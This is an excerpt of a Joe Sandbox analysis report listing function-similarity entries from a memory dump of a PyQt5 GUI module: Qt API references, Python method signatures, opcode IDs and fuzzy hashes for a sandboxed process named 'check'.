                                                                                                                                                                                                                                          • String ID: BEJ1$QTextDocument$setMetaInformation$setMetaInformation(self, info: QTextDocument.MetaInformation, a1: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3406236903-1039641548
                                                                                                                                                                                                                                          • Opcode ID: ac4b1720f9af7e75dc21068a104acbe94c541f9d8b24ce939c47056ec13968d1
                                                                                                                                                                                                                                          • Instruction ID: 4ccdf268a79e6cebd30ec421a1234d5a6984218aad78cb04953fe919066c3da8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac4b1720f9af7e75dc21068a104acbe94c541f9d8b24ce939c47056ec13968d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA21E677A08B45C5DB608F11E8893A933A4FB48BD0F918136DA9E43720EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?replace@?$QVector@VQPointF@@@@QEAAXHAEBVQPointF@@@Z.QT5CORE ref: 00007FF89D935E6C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?replace@?$F@@@F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: BiJ1$QPolygonF$replace$replace(self, i: int, value: Union[QPointF, QPoint])
                                                                                                                                                                                                                                          • API String ID: 281403271-4285370836
                                                                                                                                                                                                                                          • Opcode ID: 2f44a110847179e5deaf9e7bc812a81226b385e10047e951bab38ec6fd08784f
                                                                                                                                                                                                                                          • Instruction ID: a0b0fd9a9ffef6f915b1ced6a7c8080fdae797ac81ec25b0e1dd57c748ea5596
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f44a110847179e5deaf9e7bc812a81226b385e10047e951bab38ec6fd08784f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9210337A19B46C5DB20CF11E8891A933A4FB88BD4F924136DA9E43320EF39E959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clone@Document@@Object@@@Text
                                                                                                                                                                                                                                          • String ID: B|JH$QTextDocument$clone$clone(self, parent: Optional[QObject] = None) -> Optional[QTextDocument]
                                                                                                                                                                                                                                          • API String ID: 2699143496-4069445577
                                                                                                                                                                                                                                          • Opcode ID: 11e17d2cf28965bedf2b13cc735984bd1c51420fe902dc97c7da170f97425b84
                                                                                                                                                                                                                                          • Instruction ID: 5ffa39e7dc248c2f4b372be297510b12d3855731d90e0fe567a29872eefb5de0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e17d2cf28965bedf2b13cc735984bd1c51420fe902dc97c7da170f97425b84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21B737619B46C5DB608B51E8893AD33A8FB48BD0F924136DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFlags@QStandardItem@@QEAAXV?$QFlags@W4ItemFlag@Qt@@@@@Z.QT5GUI ref: 00007FF89D9A9F92
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Flags@$?setFlag@ItemItem@@Qt@@@@@Standard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setFlags$setFlags(self, flags: Union[Qt.ItemFlags, Qt.ItemFlag])
                                                                                                                                                                                                                                          • API String ID: 3966485804-1712263351
                                                                                                                                                                                                                                          • Opcode ID: f1c422fbad20d407f2e68926aea871673d66c311d75662946f4386e966b69fe6
                                                                                                                                                                                                                                          • Instruction ID: 83357625825cc8e8f1f1599f5fa9645df154cbbbf4cd5ce88c1c69ba04f3cb19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1c422fbad20d407f2e68926aea871673d66c311d75662946f4386e966b69fe6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521D87BA08F46C5DB608F11E8891A933B4FB48BD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPainter@@Transform@Transform@@_
                                                                                                                                                                                                                                          • String ID: BJ9|b$QPainter$setTransform$setTransform(self, transform: QTransform, combine: bool = False)
                                                                                                                                                                                                                                          • API String ID: 2953993439-4023963478
                                                                                                                                                                                                                                          • Opcode ID: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                                          • Instruction ID: a47d389aa60a213050011cb356035e8b08d5135c29faba37e9e9741a21248852
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121F537A18F46D5DB208F11E8892AD33A8FB48B80F814136DAEE43720EF39E559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setString@@@Title@Writer@@
                                                                                                                                                                                                                                          • String ID: BJ1$QPdfWriter$setTitle$setTitle(self, title: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 132041274-519051081
                                                                                                                                                                                                                                          • Opcode ID: d1a8c67e67a322c693d361418a96b7c458eee244eabac1ed4d61b2d9482a115a
                                                                                                                                                                                                                                          • Instruction ID: d72d0b7c3fcf4fddb6ca7f61f536f5cfbf1ae070b46fe419d39f45c597f9c296
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1a8c67e67a322c693d361418a96b7c458eee244eabac1ed4d61b2d9482a115a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821E277A08B46C1EB209F11E8891A933B4FB48FD0F918032DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setDefaultStyleSheet@QTextDocument@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D951EE0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDefaultDocument@@Sheet@String@@@StyleText
                                                                                                                                                                                                                                          • String ID: BJ1$QTextDocument$setDefaultStyleSheet$setDefaultStyleSheet(self, sheet: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 195671152-2482487334
                                                                                                                                                                                                                                          • Opcode ID: c0bbd7261d9cee5ba99ae8842324851fe02488f73ef6de365d46ebdafd3f23a4
                                                                                                                                                                                                                                          • Instruction ID: 0e2d5c5ed2d8ba8547cafb9b9ae3f131944356f403dde82ac973952894a25693
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bbd7261d9cee5ba99ae8842324851fe02488f73ef6de365d46ebdafd3f23a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9421D377A08B46C1DB209B11E8891A933B4FB48FD4F918132DA9E83324EF39E959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFileName@QTextDocumentWriter@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D9BBE10
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDocumentFileName@String@@@TextWriter@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextDocumentWriter$setFileName$setFileName(self, fileName: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 2944042713-309164994
                                                                                                                                                                                                                                          • Opcode ID: 360a31061a679e31dabe65e83e5b0c21e46960bf7946d696291812f91882b832
                                                                                                                                                                                                                                          • Instruction ID: 77c33991e767fc3e789ec1ae614b3ac4019737f528fe919454fef1c8ddf92d5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360a31061a679e31dabe65e83e5b0c21e46960bf7946d696291812f91882b832
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE21E437A08B46C1EB209F11E8891A933B4FB48BD0F918136DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setTabPositions@QTextBlockFormat@@QEAAXAEBV?$QList@UTab@QTextOption@@@@@Z.QT5GUI ref: 00007FF89D984150
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setBlockFormat@@List@Option@@@@@Positions@Tab@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextBlockFormat$setTabPositions$setTabPositions(self, tabs: Iterable[QTextOption.Tab])
                                                                                                                                                                                                                                          • API String ID: 1867678782-4275327497
                                                                                                                                                                                                                                          • Opcode ID: ab88a1f85d5792652e1f4167fdd797751f62c4712c0526eca19363bf94b55efe
                                                                                                                                                                                                                                          • Instruction ID: ef3001b503a65d15b256785e51da996d6ddbaf0f6d8cd0398f211aa5a1b00114
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab88a1f85d5792652e1f4167fdd797751f62c4712c0526eca19363bf94b55efe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D421D377A08B46D5DB208F15E8891A933B4FB48FD0F918132CA9E43320EF79E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setItemRoleNames@QStandardItemModel@@QEAAXAEBV?$QHash@HVQByteArray@@@@@Z.QT5GUI ref: 00007FF89D958090
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$?setArray@@@@@ByteHash@Model@@Names@RoleStandard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItemModel$setItemRoleNames$setItemRoleNames(self, roleNames: Dict[int, Union[QByteArray, bytes, bytearray]])
                                                                                                                                                                                                                                          • API String ID: 2491482276-4106150772
                                                                                                                                                                                                                                          • Opcode ID: 703bc744ed5c9f9db21ff94e38b7d10b2beecbe91f1ac68c644e2ca6df6e29b7
                                                                                                                                                                                                                                          • Instruction ID: 4a2c3a0ec3b0918c75731eaa226758a5c925134a1df93a0d993f7c26059395ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 703bc744ed5c9f9db21ff94e38b7d10b2beecbe91f1ac68c644e2ca6df6e29b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21E477A08F46D1DB208F11E8895AA73B8FB48BD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setBorderBrush@QTextTableCellFormat@@QEAAXAEBVQBrush@@@Z.QT5GUI ref: 00007FF89D966080
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBorderBrush@Brush@@@CellFormat@@TableText
                                                                                                                                                                                                                                          • String ID: BJ1$QTextTableCellFormat$setBorderBrush$setBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 905436713-2657798177
                                                                                                                                                                                                                                          • Opcode ID: e3a672cc5b4590fe9710d43a9150c6a2154369981335f7067e548da476a7dd5b
                                                                                                                                                                                                                                          • Instruction ID: 3704da36c353edf08b2a964bb99a9fa612bcce4e97423b2e5fe67676e3303510
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3a672cc5b4590fe9710d43a9150c6a2154369981335f7067e548da476a7dd5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6421D377A08B86D5DB209F11E8892A933B4FB48BD0F918132DA9E43720EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setHorizontalHeaderLabels@QStandardItemModel@@QEAAXAEBVQStringList@@@Z.QT5GUI ref: 00007FF89D9520B0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setHeaderHorizontalItemLabels@List@@@Model@@StandardString
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItemModel$setHorizontalHeaderLabels$setHorizontalHeaderLabels(self, labels: Iterable[Optional[str]])
                                                                                                                                                                                                                                          • API String ID: 1012491943-3289042179
                                                                                                                                                                                                                                          • Opcode ID: e4706b947a9b4cf1f0e85d58469cccdd0e4f76a750d0f5fdc2c6b1107025b8ed
                                                                                                                                                                                                                                          • Instruction ID: 6ccaf90bdadc957a8a8aa248aa9d3427d91540f3ec3dd6f21a2765f9ec3c98bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4706b947a9b4cf1f0e85d58469cccdd0e4f76a750d0f5fdc2c6b1107025b8ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8421D377A08B46C5DB608F15E8895A933B8FB48BD0F918132DA9E83320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDescription@PictureString@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QPictureIO$setDescription$setDescription(self, a0: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 4148849819-861822539
                                                                                                                                                                                                                                          • Opcode ID: 7d200b497ff0893bdb64659acce8d6841a9d670a14f4d1f14fcd2f4fe2700763
                                                                                                                                                                                                                                          • Instruction ID: 83a4cbe8f02e13b49acde33dded6a2eaec5d242bd882b73451ae863d80cd2071
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d200b497ff0893bdb64659acce8d6841a9d670a14f4d1f14fcd2f4fe2700763
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21E477A08B46D1EB609F11E8891A933B4FB48FD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBackground@Brush@@@Item@@Standard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setBackground$setBackground(self, abrush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3902448675-3429220716
                                                                                                                                                                                                                                          • Opcode ID: 5eee38ef73fb0049554854adb2cd5a58e1da4546df682be1d8b158b8b055f7fa
                                                                                                                                                                                                                                          • Instruction ID: f485c1737acaa4944edf60547a22fa653bce92e14d22e54de6d59002a3778f65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eee38ef73fb0049554854adb2cd5a58e1da4546df682be1d8b158b8b055f7fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3021D377A09B46C1DB209F11E8891A933B4FB48BD0F918136CA9E43320EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setItem@@StandardString@@@Text@
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setText$setText(self, atext: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3857957717-3918002662
                                                                                                                                                                                                                                          • Opcode ID: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                                          • Instruction ID: 4e7e32212c51afee985f924c7dfc9d91bef2d23756f8aec66f119025c73f153e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D21D377A08B46C1DB209F11E8891A973A8FB48BD0F918032DA9E43720EF39E559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FF89D98DF28
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D98DF34
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPalette$base$base(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 868068763-3618895797
                                                                                                                                                                                                                                          • Opcode ID: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                                          • Instruction ID: 8f38c4dfe347344032162b5d910c8112180cedd163ac2e98f9e4c51141473bac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6111977A18A46C6EB209F11E8497A933A4FB44FD0F914036DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FF89D98FD68
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D98FD74
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPalette$highlightedText$highlightedText(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 868068763-3394257884
                                                                                                                                                                                                                                          • Opcode ID: 5dec472b35c8dfa69d6c4d68c5599f954c391fbcb6e0b12ea3f467851b48b76c
                                                                                                                                                                                                                                          • Instruction ID: 4a985fe259735cb7fa4f692e4a6930adb7f033b9da03fffc5d9b187078e47d53
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dec472b35c8dfa69d6c4d68c5599f954c391fbcb6e0b12ea3f467851b48b76c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1111976B18A8686EB109F11E8497A933A4FB84FD0F914036DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?parameters@DecodePictureUnicode_
                                                                                                                                                                                                                                          • String ID: QPictureIO$parameters$parameters(self) -> Optional[str]
                                                                                                                                                                                                                                          • API String ID: 2291770364-176309411
                                                                                                                                                                                                                                          • Opcode ID: 970b3cb4bb6ea70e4d416e4c643904a37fe67a490dd75f929b6762e55fb22985
                                                                                                                                                                                                                                          • Instruction ID: d9e9a2ce8fb169802bd05f82cbdedae157c1faf4c896247d76766535c47509af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970b3cb4bb6ea70e4d416e4c643904a37fe67a490dd75f929b6762e55fb22985
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A112172A08A46C1EB209F25D84966933E0FB44FE4F914232DAAE03360EE7CE555C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?beginInsertColumns@QAbstractItemModel@@IEAAXAEBVQModelIndex@@HH@Z.QT5CORE ref: 00007FF89D941F93
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?beginAbstractColumns@Index@@InsertItemModelModel@@
                                                                                                                                                                                                                                          • String ID: BJ9ii$QStandardItemModel$beginInsertColumns$beginInsertColumns(self, parent: QModelIndex, first: int, last: int)
                                                                                                                                                                                                                                          • API String ID: 4214563904-3799555195
                                                                                                                                                                                                                                          • Opcode ID: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                                          • Instruction ID: 29b20789a65c9f9f786efa913e364054e4bf6888cebaaa936e9a51bbaefbfb04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121F436B18F4AC5DB208F11E8896A933A4FB48BD4F914132DA9E07720EF39E959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPainter@@QEBAAEBVQBrush@@XZ.QT5GUI ref: 00007FF89D993D7D
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D993D89
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@$?brush@Painter@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$brush$brush(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 3322587729-2750601599
                                                                                                                                                                                                                                          • Opcode ID: eb3dc68d2583da2c283f275c890ba41048bcb0014eef83ec5da13e0976ce2a5b
                                                                                                                                                                                                                                          • Instruction ID: 2955b77d2f70eb29cbf36ee8bd337a7f7962aa49e76bcefd2cfd4995e98367c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3dc68d2583da2c283f275c890ba41048bcb0014eef83ec5da13e0976ce2a5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99112877A18B4682EB109F21E8596A933A4FB44FD0F858032DE8E07320EF7CE559C748
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
